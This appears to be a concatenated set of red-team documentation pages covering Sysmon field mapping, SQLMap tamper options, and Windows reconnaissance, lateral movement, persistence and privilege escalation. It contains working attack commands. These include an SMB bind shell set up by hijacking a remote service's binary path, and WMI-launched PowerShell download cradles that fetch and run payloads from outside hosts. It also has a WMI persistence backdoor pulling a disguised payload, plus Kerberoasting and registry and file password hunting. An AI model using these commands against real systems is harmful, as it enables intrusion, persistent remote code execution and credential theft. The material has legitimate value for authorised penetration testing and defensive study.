| | Field | Detail | 159 | | ------------------- | ---------------------------------------------------------------------------------- | 160 | | UtcTime | Time in UTC when event was created | 161 | | ProcessGuid | Process Guid of the process that made the network connection | 162 | | ProcessId | Process ID used by the OS to identify the process that made the network connection | 163 | | Image | File path of the process that made the network connection | 164 | | User | Name of the account who made the network connection | 165 | | Protocol | Protocol being used for the network connection | 166 | | Initiated | Indicates whether the process initiated the TCP connection | 167 | | SourceIsIpv6 | Is the source IP an Ipv6 address | 168 | | SourceIp | Source IP address that made the network connection | 169 | | SourceHostname | DNS name of the host that made the network connection | 170 | | SourcePort | Source port number | 171 | | SourcePortName | Name of the source port being used | 172 | | DestinationIsIpv6 | Is the destination IP an Ipv6 address | 173 | | DestinationIp | IP address destination | 174 | | DestinationHostname | DNS name of the host that is contacted | 175 | | DestinationPort | Destination port number | 176 | | DestinationPortName | Name of the destination port | 177 | 178 | #### Elastic ECS Mapping 179 | 180 | Example Event Log: 181 | 182 | ```text 183 | Network connection detected: 184 | RuleName: technique_id=T1021,technique_name=Remote Services 185 | UtcTime: 2022-01-31 19:41:19.612 186 | ProcessGuid: {ffc6f37f-da30-61f7-1500-000000000a00} 187 | ProcessId: 956 188 | Image: C:\Windows\System32\svchost.exe 189 | User: NT AUTHORITY\NETWORK SERVICE 190 | Protocol: tcp 191 | Initiated: false 192 | SourceIsIpv6: false 193 | SourceIp: 94.232.42.95 194 | SourceHostname: - 195 | SourcePort: 52191 196 | SourcePortName: - 197 | DestinationIsIpv6: false 198 | DestinationIp: 10.40.2.103 199 | DestinationHostname: - 200 | DestinationPort: 3389 201 | DestinationPortName: - 202 | ``` 203 | 204 | | ECS Event Mapping | Field Data (Example) | Sysmon Field Mapping | 205 | |----|----|----| 206 | | event.code | 3 | N/A | 207 | | event.kind | event | N/A | 208 | | event.module | sysmon | N/A | 209 | | event.category | Network | N/A | 210 | | event.type | connection, start, protocol | N/A | 211 | | event.provider | Microsoft-Windows-Sysmon | N/A | 212 | | event.action | Network connection detected (rule: NetworkConnect) | N/A | 213 | | destination.domain | - | DestinationHostname | 214 | | destination.ip | 10.40.2.103 | DestinationIp | 215 | | destination.port | 3389 | DestinationPort | 216 | | event.created | Jan 31, 2022 @ 14:41:22.352 | UtcTime | 217 | | network.community_id | 1:pFiw4iD296r81i3sN/GWjIMRpVk= | N/A | 218 | | network.direction | ingress | Initiated | 219 | | network.protocol | - | N/A | 220 | | network.transport | tcp | Protocol | 221 | | network.type | ipv4 | N/A | 222 | | process.entity_id | {ffc6f37f-da30-61f7-1500-000000000a00} | ProcessGuid | 223 | | process.executable | C:\Windows\System32\svchost.exe | Image | 224 | | process.name | svchost.exe | Image | 225 | | process.pid | 956 | ProcessId | 226 | | related.ip | 94.232.42.95, 10.40.2.103 | N/A | 227 | | related.user | NETWORK SERVICE | User | 228 | | source.domain | - | SourceHostname | 229 | | source.ip | 94.232.42.95 | SourceIp | 230 | | source.port | 52191 | SourcePort | 231 | | user.domain | NT AUTHORITY | User | 232 | | user.id | S-1-5-18 | User | 233 | | user.name | NETWORK SERVICE | User | 234 | 235 | ### EventID 3 Service state changed 236 | 237 | The service state change event reports the state of the Sysmon service (started or stopped). 238 | -------------------------------------------------------------------------------- /docs/stylesheets/extra.css: -------------------------------------------------------------------------------- 1 | .md-grid { 2 | max-width: 1640px; 3 | } -------------------------------------------------------------------------------- /docs/web_app/sql_injections.md: -------------------------------------------------------------------------------- 1 | # SQL Injections 2 | 3 | ## SQLMap 4 | 5 | ### Clone from dev for bleeding edge: 6 | `git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev` 7 | 8 | ### Run SQLMap via a file 9 | ```python sqlmap-dev/sqlmap.py -r login-request.txt``` 10 | 11 | ### Run from file with threads: 12 | ```python sqlmap-dev/sqlmap.py -r login-request.txt --threads=10``` 13 | 14 | ### Run from file with threads and level: 15 | ```python sqlmap-dev/sqlmap.py -r login-request.txt --level=5 --risk=3``` 16 | 17 | ## Tamper all the things: 18 | 19 | ### General Tamper Testing: 20 | ```tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes``` 21 | 22 | ### MSSQL Tamper Testing: 23 | ```tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes``` 24 | 25 | ### MySQL Tamper Testing: 26 | ```tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor``` 27 | 28 | -------------------------------------------------------------------------------- /docs/windows/collection_operations.md: -------------------------------------------------------------------------------- 1 | 2 | # Windows Collection Operations 3 | 4 | ## File Share Hunting 5 | 6 | ### Decrypt VBE scripts: 7 | 8 | ```https://blog.didierstevens.com/2016/03/29/decoding-vbe/``` 9 | 10 | ### look for all items in a directory with the * file format 11 | 12 | Here some interesting examples: 13 | 14 | ```powershell 15 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.vsdx 16 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.vsd 17 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.dmg 18 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.pptx 19 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.docx 20 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.vsd 21 | ``` 22 | 23 | ### Look for all XLS files that are password protected (Binary Format) 24 | 25 | ```powershell 26 | Get-ChildItem -path C:\ -recurse | foreach {gc -encoding byte -TotalCount 3000 -ReadCount 20 ./$_ |% {"{0:x2}" -f $_} | Select-String -Pattern "13 00 02 00" |% {$_ -match '13 00 02 00 (.{5})'}; $matches[1]} 27 | ``` -------------------------------------------------------------------------------- /docs/windows/lat_movement.md: -------------------------------------------------------------------------------- 1 | # Windows Lateral Movement 2 | 3 | ## Native SMB 4 | 5 | ### SMB Bind Shell via remote.exe & Service (SC) 6 | 7 | 1. **Move remote.exe to target**: 8 | ``` 9 | net use T: \\192.168.1.[x]\C$ 10 | 11 | move remote.exe T:\ 12 | ``` 13 | 14 | 2. **Target service to be started** 15 | ``` 16 | C:\Users\gte-1>sc.exe \\192.168.1.118 qc msiserver 17 | [SC] QueryServiceConfig SUCCESS 18 | 19 | SERVICE_NAME: msiserver 20 | TYPE : 20 WIN32_SHARE_PROCESS 21 | START_TYPE : 3 DEMAND_START 22 | ERROR_CONTROL : 1 NORMAL 23 | BINARY_PATH_NAME : C:\WINDOWS\system32\msiexec.exe /V 24 | LOAD_ORDER_GROUP : 25 | TAG : 0 26 | DISPLAY_NAME : Windows Installer 27 | DEPENDENCIES : RpcSs 28 | SERVICE_START_NAME : LocalSystem 29 | ``` 30 | 31 | 3. **Set Target Bin Path** 32 | ``` 33 | sc \\192.168.1.118 config msiserver binpath= "cmd.exe /C start /B C:\remote.exe /S cmd.exe pwnme" 34 | ``` 35 | 36 | 4. **Check Target Bin Path** 37 | ``` 38 | C:\Users\gte-1>sc.exe \\192.168.1.118 qc msiserver 39 | [SC] QueryServiceConfig SUCCESS 40 | 41 | SERVICE_NAME: msiserver 42 | TYPE : 20 WIN32_SHARE_PROCESS 43 | START_TYPE : 3 DEMAND_START 44 | ERROR_CONTROL : 1 NORMAL 45 | BINARY_PATH_NAME : cmd.exe /C /B C:\remote.exe /S cmd.exe pwnme 46 | LOAD_ORDER_GROUP : 47 | TAG : 0 48 | DISPLAY_NAME : Windows Installer 49 | DEPENDENCIES : RpcSs 50 | SERVICE_START_NAME : LocalSystem 51 | ``` 52 | 53 | 5. **Execute target remote.exe payload** 54 | ``` 55 | C:\Users\gte-1>sc.exe \\192.168.1.118 start msiserver 56 | [SC] StartService FAILED 1053: 57 | 58 | The service did not respond to the start or control request in a timely fashion. 59 | ``` 60 | 61 | 6. **Connect to SMB bind shell** 62 | ``` 63 | C:\Users\gte-1>"\\WIN-5696DUCBS1B\team-share\GTE-Labs\Day 4\Lab 2\remote.exe" /C 64 | 192.168.1.118 "pwnme" 65 | ************************************** 66 | *********** REMOTE ************ 67 | *********** CLIENT ************ 68 | ************************************** 69 | Connected... 70 | 71 | ]Microsoft Windows [Version 5.2.3790] 72 | (C) Copyright 1985-2003 Microsoft Corp. 73 | 74 | C:\WINDOWS\system32> 75 | **Remote: Connected to GTE-WIN7-1-PC gte-1 [Thu 8:50 AM] 76 | ``` 77 | 78 | 7. **Clean Up Target** 79 | ``` 80 | C:\Users\gte-1>sc \\192.168.1.118 config msiserver binpath= "C:\WINDOWS\system32 81 | \msiexec.exe /V" 82 | [SC] ChangeServiceConfig SUCCESS 83 | 84 | ******ESCAPE QUOTES IF NEEDED****** 85 | sc \\192.168.1.177 config msiserver binpath= "\"C:\WINDOWS\system32\msiexec.exe /V\"" 86 | ``` 87 | 88 | 8. **Alt move patern via Reg Edit** 89 | ``` 90 | reg add \\192.168.1.177\hklm\system\currentcontrolset\services\msiserver /v ImagePath /t REG_EXPAND_SZ /d "cmd /c start /b c:\windows\system32\remote.exe /s cmd.exe pwnme" /f 91 | ``` 92 | 93 | ## Powershell Lateral Movement 94 | 95 | ### WMI Internal Reverse Port Forward 96 | 97 | Reverse portforward staged payload internal -> a download cradle 98 | 99 | ```powershell 100 | Invoke-WmiMethod -ComputerName 43.*.*.* -Class Win32_Process -Name Create -ArgumentList "powershell.exe -w 1 -C `"&([ScriptBlock]::Create((([Char[]](New-Object Net.WebClient).DownloadData('http://43.*.*.*:10080/updates/updater'))-Join'')))`"" 101 | ``` 102 | 103 | Reverse portforward staged payload internal -> a download cradle -> with PS creds 104 | 105 | ```powershell 106 | $credential = New-Object System.Management.Automation.PSCredential ("DA\some",("TestPassword" | ConvertTo-SecureString -AsPlainText -Force)); $cmd = "powershell.exe -w 1 -C `"&([ScriptBlock]::Create((([Char[]](New-Object Net.WebClient).DownloadData('http://test.com/download/test'))-Join'')))`""; Invoke-WmiMethod -ComputerName '43.160.34.168' -Credential $credential Win32_Process -Name 'Create' -ArgumentList $cmd 107 | ``` 108 | 109 | ### Unconstrained delegation to attack DA or user credentials 110 | 111 | Powershell and PowerView list of servers that allow for unconstrained delegation to attack DA or user credentials: 112 | 113 | ```powershell 114 | powerpick Get-DomainComputer -Unconstrained 115 | > Then e-mail DA with a 1x1px image to a UNC path. 116 | > TGS Service ticket is delivered to compromised server and stored in LSASS 117 | > Can extract and use TGT until it expires. 118 | > Can be used to get krbtgt 119 | ``` 120 | -------------------------------------------------------------------------------- /docs/windows/local_sa_cmds.md: -------------------------------------------------------------------------------- 1 | # Windows Local Situational Awareness Commands 2 | 3 | ## Find all token / user data: 4 | ```whoami /all``` 5 | ``` 6 | C:\Users\KILLSWITCH-GUI>whoami /all 7 | 8 | USER INFORMATION 9 | ---------------- 10 | 11 | User Name SID 12 | ============================== ============================================== 13 | desktop- \killswitch-gui 14 | 15 | 16 | GROUP INFORMATION 17 | ----------------- 18 | 19 | Group Name Type SID Attributes 20 | ============================================================= ================ ================================================================================================ ================================================== 21 | Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group 22 | NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only 23 | BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only 24 | BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group 25 | NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group 26 | CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group 27 | 28 | 29 | 30 | PRIVILEGES INFORMATION 31 | ---------------------- 32 | 33 | Privilege Name Description State 34 | ============================= ==================================== ======== 35 | SeShutdownPrivilege Shut down the system Enabled 36 | SeChangeNotifyPrivilege Bypass traverse checking Enabled 37 | SeUndockPrivilege Remove computer from docking station Disabled 38 | SeIncreaseWorkingSetPrivilege Increase a process working set Disabled 39 | SeTimeZonePrivilege Change the time zone Disabled 40 | 41 | 42 | ``` 43 | 44 | ## Get Local ipconfig data: 45 | ```ipconfig /all``` 46 | ``` 47 | C:\Users\KILLSWITCH-GUI>ipconfig /all 48 | 49 | Windows IP Configuration 50 | 51 | Host Name . . . . . . . . . . . . : DESKTOP- 52 | Primary Dns Suffix . . . . . . . : 53 | Node Type . . . . . . . . . . . . : Hybrid 54 | IP Routing Enabled. . . . . . . . : No 55 | WINS Proxy Enabled. . . . . . . . : No 56 | DNS Suffix Search List. . . . . . : -router.home 57 | 58 | Ethernet adapter Ethernet 2: 59 | 60 | Connection-specific DNS Suffix . : 61 | Description . . . . . . . . . . . : PANGP Virtual Ethernet Adapter 62 | Physical Address. . . . . . . . . : 02-50-41-00-00-01 63 | DHCP Enabled. . . . . . . . . . . : No 64 | Autoconfiguration Enabled . . . . : Yes 65 | Link-local IPv6 Address . . . . . : fe80::344b:2314:f01d:a51%8(Preferred) 66 | IPv4 Address. . . . . . . . . . . : 10.0.0.235(Preferred) 67 | Subnet Mask . . . . . . . . . . . : 255.255.255.255 68 | Default Gateway . . . . . . . . . : 0.0.0.0 69 | DHCPv6 IAID . . . . . . . . . . . : 419582017 70 | DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-20-E4-0D-90-30-9C-23-04-69-34 71 | DNS Servers . . . . . . . . . . . : ::1 72 | 127.0.0.1 73 | NetBIOS over Tcpip. . . . . . . . : Enabled 74 | 75 | ``` 76 | 77 | ## List all virtual / physical drives with Powershell: 78 | ```gdr -PSProvider 'FileSystem``` 79 | ``` 80 | PS C:\Users\KILLSWITCH-GUI> gdr -PSProvider 'FileSystem' 81 | 82 | Name Used (GB) Free (GB) Provider Root CurrentLocation 83 | ---- --------- --------- -------- ---- --------------- 84 | B 0.00 0.25 FileSystem B:\ 85 | C 138.56 325.85 FileSystem C:\ Users\KILLSWITCH-GUI 86 | D 4503.95 3872.36 FileSystem D:\ 87 | 88 | ``` 89 | 90 | ```[System.IO.DriveInfo]::GetDrives() | Format-Table``` 91 | ``` 92 | Name DriveType DriveFormat IsReady AvailableFreeSpace TotalFreeSpace TotalSize RootDirectory VolumeLabel 93 | ---- --------- ----------- ------- ------------------ -------------- --------- ------------- ----------- 94 | A:\ Network False A:\ 95 | C:\ Fixed NTFS True 771920580608 771920580608 988877418496 C:\ Windows 96 | D:\ Fixed NTFS True 689684144128 689684144128 1990045179904 D:\ Big Drive 97 | E:\ CDRom False E:\ 98 | G:\ Network NTFS True 69120000 69120000 104853504 G:\ GratefulDead 99 | ``` 100 | 101 | 102 | ## Check if host is alive via cmd: 103 | ``` 104 | ping -n 1 host.com - overt 105 | nbtstat -A host.com - Covert: uses NetBios TCP/IP to check if interface is up 106 | ``` 107 | 108 | ## List the password policy for the domain: 109 | ``` 110 | net accounts 111 | ``` 112 | ``` 113 | C:\Users\KILLSWITCH-GUI>net accounts 114 | Force user logoff how long after time expires?: Never 115 | Minimum password age (days): 0 116 | Maximum password age (days): 42 117 | Minimum password length: 0 118 | Length of password history maintained: None 119 | Lockout threshold: Never 120 | Lockout duration (minutes): 30 121 | Lockout observation window (minutes): 30 122 | Computer role: WORKSTATION 123 | ``` 124 | 125 | ## Get the current DC your talking to: 126 | ``` 127 | cmd /c echo %LOGONSERVER% 128 | powershell echo $ENV:LOGONSERVER 129 | ``` 130 | 131 | ## Resolve host-name to IP addr IPv4 with out ping via Powershell: 132 | ``` 133 | [System.Net.DNS]::GetHostAddresses("NAME-PC") 134 | ``` 135 | ``` 136 | PS C:\Users\KILLSWITCH-GUI> [System.Net.DNS]::GetHostAddresses("google.com") 137 | 138 | 139 | Address : 2382879148 140 | AddressFamily : InterNetwork 141 | ScopeId : 142 | IsIPv6Multicast : False 143 | IsIPv6LinkLocal : False 144 | IsIPv6SiteLocal : False 145 | IsIPv6Teredo : False 146 | IsIPv4MappedToIPv6 : False 147 | IPAddressToString : 172.217.7.142 148 | ``` 149 | 150 | ## Resolve ip to host-name: 151 | ```powerview 152 | [System.Net.Dns]::GetHostbyAddress("8.8.8.8") 153 | ``` 154 | ``` 155 | PS C:\Users\KILLSWITCH-GUI> [System.Net.Dns]::GetHostbyAddress("8.8.8.8") 156 | 157 | HostName Aliases AddressList 158 | -------- ------- ----------- 159 | google-public-dns-a.google.com {} {8.8.8.8} 160 | ``` 161 | 162 | ## List last boot time via Powershell: 163 | ```powershell 164 | gwmi Win32_OperatingSystem | select __SERVER,@{label='LastRestart';expression={$_.ConvertToDateTime($_.LastBootUpTime}} 165 | ``` -------------------------------------------------------------------------------- /docs/windows/network_sa_cmds.md: -------------------------------------------------------------------------------- 1 | # Windows Network Situational Awareness Commands 2 | 3 | ## PowerView Situational Awareness 4 | 5 | *PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.* 6 | 7 | *It also implements various useful metafunctions, including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See function descriptions for appropriate usage and available options. For detailed output of underlying functionality, pass the -Verbose or -Debug flags.* 8 | 9 | *For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.*[^1] 10 | 11 | !!! note 12 | All command can be run via PowerPick to increase your OPSEC. Reducing your 13 | forensic artifact impact. *Allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the Powershell scripts*[^2] 14 | 15 | ### Get computers in LDAP search base and show the DNS name and OS only 16 | 17 | ```powershell 18 | Get-DomainComputer -searchbase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" --Properties dnshostname,operatingsystem 19 | ``` 20 | 21 | ### Computers with OS matching 2008, with a OU of intrest 22 | 23 | ```powershell 24 | Get-DomainComputer -searchbase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" -OperatingSystem *2008* 25 | ``` 26 | 27 | ### Computers in LDAP search base and pipe host names of intrest to Get-NetSession 28 | 29 | ```powershell 30 | powerpick Get-DomainComputer -SearchBase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" | where-object {$_.dnshostname -like "*HOST-NAME*"} | Get-NetSession 31 | ``` 32 | 33 | ### Remote Desktop Users for a machine for just medium intg RDP 34 | 35 | ```powershell 36 | Get-NetLocalGroupMember HOST-NAME -GroupName "Remote Desktop Users" 37 | ``` 38 | 39 | ### Admins for a machine for just medium intg RDP 40 | 41 | ```powershell 42 | Get-NetLocalGroupMember HOST-NAME 43 | ``` 44 | 45 | ### Corelate GPOs to domain system 46 | 47 | ```powershell 48 | Get-NetOU -GPLink "{45172B9C-749A-479A-A9C7-4F85083CD517}" | % { Get-DomainComputer -ADSPath $_.distinguishedname -Properties dnshostname} 49 | ``` 50 | 51 | ### Find all computers and pipe into local admins of machines 52 | 53 | ```powershell 54 | Get-DomainComputer -searchbase "LDAP://OU=Location Location,OU=SOME,DC=am,DC=somthing,DC=com" -Properties name FindOne | Get-NetLocalGroupMember -Method API -Properties ComputerName,GroupName,MemberName| FT -Wrap 55 | ``` 56 | 57 | ### Find all computer objects / systems that have a GPO applied 58 | 59 | ```powershell 60 | Get-DomainOU -GPLink "{A8E139C2-8A5C-455B-905F-FF509D112E8C}" | % { Get-DomainComputer -ADSPath $_.distinguishedname -Properties dnshostname} 61 | ``` 62 | 63 | ### Find all accounts with admin count set / DC sync 64 | 65 | ```powershell 66 | Get-DomainUser -admincount -Properties samaccountname 67 | ``` 68 | 69 | ### Check if user has rights to DC sync with the PDC 70 | 71 | ```powershell 72 | Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { 73 | ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') 74 | } 75 | ``` 76 | 77 | ### Pull all email's from user object of a certain OU and output to file for download 78 | 79 | ```powershell 80 | get-domainuser -searchbase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" -properties cn,mail,userprincipalname,extensionattribute10,msrtcsip-primaryuseraddress | out-file -encoding ASCII C:\Windows\Tasks\contacts.txt 81 | ``` 82 | 83 | [^1]: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon#powerview 84 | [^2]: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick -------------------------------------------------------------------------------- /docs/windows/persistence.md: -------------------------------------------------------------------------------- 1 | # Windows Persistence 2 | 3 | ## WMI Subscription 4 | 5 | ### Install wmi persistence for on-boot 6 | 7 | Great research can be found on Black Hats site[^1]. The script can be found at https://github.com/PowerShellMafia/PowerSploit/blob/master/Persistence/Persistence.psm1 or in the Empire agent. 8 | 9 | !!! warning 10 | This method sometimes returns two callbacks on boot! 11 | 12 | ```powershell 13 | Install-WmiSubscription -CustomEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" -Namespace "root\cimv2" -DiskStorageLocation "C:\Windows\tasks\cat.jpg" -Command "`"&([ScriptBlock]::Create((([Char[]](New-Object Net.WebClient).DownloadData('http://www.--SNIP--.com/corp/priv/cloud/adp_update.pdf'))-Join'')))`"" -Verbose 14 | ``` 15 | 16 | [^1]: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf -------------------------------------------------------------------------------- /docs/windows/priv_esc.md: -------------------------------------------------------------------------------- 1 | # Windows Privilege Escalation Commands 2 | 3 | ## Host Privilege Escalation 4 | 5 | ### Schduled Tasks Path Alteration 6 | Schduled tasks we can alter by path? They run at system context: 7 | 8 | ```schtasks /query /fo LIST /v``` 9 | ``` 10 | C:\Users\KILLSWITCH-GUI>schtasks /query /fo LIST /v 11 | 12 | Folder: \ 13 | HostName: DESKTOP- 14 | TaskName: \ASC10_PerformanceMonitor 15 | Next Run Time: N/A 16 | Status: Ready 17 | Logon Mode: Interactive only 18 | Last Run Time: 11/30/1999 12:00:00 AM 19 | Last Result: 267011 20 | Author: KILLSWITCH-GUI 21 | Task To Run: C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe /Task 22 | Start In: N/A 23 | Comment: N/A 24 | Scheduled Task State: Enabled 25 | Idle Time: Disabled 26 | Power Management: 27 | Run As User: KILLSWITCH-GUI 28 | Delete Task If Not Rescheduled: Disabled 29 | Stop Task If Runs X Hours and X Mins: Disabled 30 | Schedule: Scheduling data is not available in this format. 31 | Schedule Type: At logon time 32 | Start Time: N/A 33 | Start Date: N/A 34 | End Date: N/A 35 | Days: N/A 36 | Months: N/A 37 | Repeat: Every: N/A 38 | Repeat: Until: Time: N/A 39 | Repeat: Until: Duration: N/A 40 | Repeat: Stop If Still Running: N/A 41 | 42 | ``` 43 | 44 | ### Evaluating Vulnerable Services 45 | We can use the `net start` command to evaluate services on the system: 46 | 47 | ``` 48 | C:\Users\KILLSWITCH-GUI>net start 49 | These Windows services are started: 50 | 51 | Advanced SystemCare Service 10 52 | Application Information 53 | Application Management 54 | Background Intelligent Transfer Service 55 | Background Tasks Infrastructure Service 56 | Base Filtering Engine 57 | cFosSpeed System Service 58 | CNG Key Isolation 59 | COM+ Event System 60 | Computer Browser 61 | Connected Devices Platform Service 62 | Connected Devices Platform User Service_7e8e2a 63 | Connected User Experiences and Telemetry 64 | Contact Data_7e8e2a 65 | CoreMessaging 66 | 67 | ``` 68 | 69 | ### Evaluating Vulnerable Drivers 70 | Look for vuln drivers loaded, we often don't spend enough time looking at this: 71 | 72 | ```DRIVERQUERY /FO table``` 73 | ``` 74 | C:\Users\KILLSWITCH-GUI>DRIVERQUERY /FO table 75 | 76 | Module Name Display Name Driver Type Link Date 77 | ============ ====================== ============= ====================== 78 | 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM 79 | 3ware 3ware Kernel 5/18/2015 6:28:03 PM 80 | ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM 81 | AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM 82 | acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM 83 | acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM 84 | AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM 85 | acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM 86 | ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM 87 | 88 | ``` 89 | 90 | ### Evaluating KBs/Patches 91 | Look for KB / Patches installed or not: 92 | ```wmic qfe get Caption,Description,HotFixID,InstalledOn``` 93 | ``` 94 | C:\Users\KILLSWITCH-GUI>wmic qfe get Caption,Description,HotFixID,InstalledOn 95 | Caption Description HotFixID InstalledOn 96 | http://support.microsoft.com/?kbid=4022405 Update KB4022405 6/8/2017 97 | http://support.microsoft.com/?kbid=4022730 Security Update KB4022730 6/8/2017 98 | http://support.microsoft.com/?kbid=4025376 Security Update KB4025376 7/12/2017 99 | http://support.microsoft.com/?kbid=4025342 Security Update KB4025342 7/15/2017 100 | 101 | ``` 102 | ```wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."``` 103 | ``` 104 | C:\Users\KILLSWITCH-GUI> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB4022405" 105 | http://support.microsoft.com/?kbid=4022405 Update KB4022405 6/8/2017 106 | ``` 107 | 108 | ### Locating Unattended configs 109 | Look for unattended configs in the following dirs: 110 | ``` 111 | c:\sysprep.inf 112 | c:\sysprep\sysprep.xml 113 | %WINDIR%\Panther\Unattend\Unattended.xml 114 | %WINDIR%\Panther\Unattended.xml 115 | ``` 116 | 117 | ### Locating AlwaysInstallElevated 118 | key set to DWORD 1: 119 | ```reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated``` 120 | ``` 121 | C:\Users\KILLSWITCH-GUI>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 122 | ERROR: The system was unable to find the specified registry key or value. 123 | ``` 124 | 125 | ### Locating Sensitive Files 126 | Search the file system for file names containing certain keywords via cmd: 127 | ```dir /s *pass* == *cred* == *vnc* == *.config*``` 128 | ``` 129 | C:\Users\KILLSWITCH-GUI>dir /s *pass* == *cred* == *vnc* == *.config* 130 | Volume in drive C has no label. 131 | Volume Serial Number is DA67-AFD2 132 | 133 | Directory of C:\Users\KILLSWITCH-GUI\AppData\Local 134 | 135 | 06/28/2017 09:04 AM password-app 136 | 0 File(s) 0 bytes 137 | ``` 138 | 139 | ### Locating Sensitive Data In Files 140 | Search certain file types for a keyword via cmd: 141 | ```findstr /si password *.xml *.ini *.txt``` 142 | ``` 143 | C:\Users\KILLSWITCH-GUI>findstr /si password *.xml *.ini *.txt 144 | .PyCharmCE2017.1\config\options\ide.general.xml: 145 | AppData\Local\lxss\rootfs\usr\share\dbus-1\interfaces\org.freedesktop.Accounts.User.xml: 146 | ``` 147 | 148 | ### Locating Passwords Within Thhe Registry 149 | ``` 150 | reg query HKLM /f password /t REG_SZ /s 151 | reg query HKCU /f password /t REG_SZ /s 152 | ``` 153 | ``` 154 | C:\Users\KILLSWITCH-GUI>reg query HKLM /f password /t REG_SZ /s 155 | 156 | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415} 157 | (Default) REG_SZ Picture Password Enrollment UX 158 | 159 | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a} 160 | (Default) REG_SZ PicturePasswordLogonProvider 161 | ``` 162 | 163 | ### Locating Unquoted Service Paths 164 | ```wmic service get name,startmode,pathname | findstr /i /v ":\windows\" | findstr /v """``` 165 | ``` 166 | C:\Users\KILLSWITCH-GUI>wmic service get name,startmode,pathname | findstr /i /v ":\windows\" | findstr /v """ 167 | Name PathName StartMode 168 | AJRouter C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted Manual 169 | ALG C:\WINDOWS\System32\alg.exe Manual 170 | AppIDSvc C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted 171 | ``` 172 | 173 | --- 174 | 175 | ## Domain Privilege Escalation 176 | 177 | ### Kerbroasting 178 | https://gist.github.com/HarmJ0y/cc1004307157e372fc5bd3f89e553059 179 | 180 | #### Kerbroast a domain and set for crashing is hashcat format: 181 | ```powershell 182 | Invoke-Kerberoast -OutputFormat Hashcat | fl 183 | ``` 184 | 185 | #### ACL rights to set a SPN on user account and crack via SPN kerb ticket: 186 | ```powershell 187 | 1. Set-DomainObject -Identity 'user' -set@{serviceprincipalname='blah\blah'} 188 | 2. Invoke-Kerberoast -Identity 'user' -OutputFormat hashcat | fl ==alternative command:== Get-DomainUser -Identity 'user' | Get-DomainSPNTicket 189 | 3. Set-DomainObject -Identity 'user' -Clear serviceprincipalname 190 | ``` -------------------------------------------------------------------------------- 